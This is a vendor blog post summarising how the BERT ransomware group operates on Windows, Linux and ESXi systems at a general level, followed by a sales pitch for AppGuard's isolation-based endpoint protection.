BERT Ransomware Rising: Why Businesses Must Isolate, Not Just Respond

A Swift and Simple Threat: The Rise of BERT Ransomware

A newly surfaced, fast-moving ransomware group known as BERT—also tracked by Trend Micro as Water Pombero—is making waves across Asia, Europe, and the United States. Since its discovery in April 2025, this threat actor has targeted critical sectors such as healthcare, technology, and event services CSO OnlineTrend Micro.

What makes BERT particularly dangerous is not its sophistication, but its speed, simplicity, and effectiveness.

How BERT Operates Across Platforms

On Windows

BERT’s Windows variant employs a straightforward codebase to match and kill processes essential to servers and databases.. A PowerShell loader (start.ps1) carries out an alarming sequence of actions:

• Escalates privileges

• Disables Windows Defender, the firewall, and UAC

• Downloads and executes the payload.exe from a remote host (IP tied to Russian-registered ASN 39134)

Because the initial access vector remains unclear, the best defense is strong endpoint protection, admin controls, and proactive security measures.

On Linux and ESXi Systems

The Linux variant of BERT cranks up encryption speed using up to 50 concurrent threads, enabling rapid file encryption and minimizing detection windows. Even more troubling: BERT can forcibly shut down ESXi virtual machines, significantly complicating recovery.

Why Detection Alone Isn’t Enough

Experts warn this is a wake-up call. Despite its basic tools, BERT is highly effective at exploiting:

• Weak passwords

• Outdated endpoint protections

• Excessive administrative access

• Poor monitoring

• Unsafe backups

Security professionals must be alert to suspicious PowerShell behavior—especially attempts to disable security tools or download remote payloads—and anomalous hypervisor activity like mass VM shutdowns.

The New Ransomware Landscape: Lean, Fast, Devastating

BERT is part of a broader trend: ransomware that is lighter, modular, and speed-optimized:

• Gunra, which appends .encrt to encrypted files

• Silent Ransom, which steals data before demanding ransom

• Hybrid threats like Mamona, blending speed with stealth

These trends expose the limits of traditional AV, EDR, and perimeter-based tools. What’s needed now: containment-first strategies that limit blast radius and isolate threats quickly.

From “Detect and Respond” to “Isolation and Containment”: Enter AppGuard

We’ve seen what BERT and its peers can do. Now, it’s time to shift the security paradigm.

AppGuard, with its proven 10-year track record, delivers strong endpoint protection by isolating untrusted behaviors and processes before they can harm your system—not just detecting threats after they occur.

This approach enables businesses to:

• Contain threats at first sight

• Prevent privilege escalation and payload execution

• Safeguard critical systems—even during rapid, concurrent attacks like those seen in Linux/ESXi environments

Stop playing the crazy game. Come over to the App Guard way of doing things.

Your Next Step: Shield Your Business with AppGuard

Cyber threats like BERT prove that speed and simplicity can wreak havoc when defenses rely only on detection and response. It’s time to bolster your security posture with a strategy rooted in isolation and containment.

Business owners, talk with us at CHIPS today to discover how AppGuard can safeguard your endpoints from threats like BERT. Let’s move beyond reactive postures to proactive protection.

Why This Matters:

BERT’s rapid expansion and ability to disable defenses show that defense-in-depth is no longer optional—it’s urgent. If your protection strategy still leans heavily on “detect and respond,” it’s time to modernize. AppGuard’s isolation-first model offers the real-world resilience your business needs.

Like this article? Please share it with others!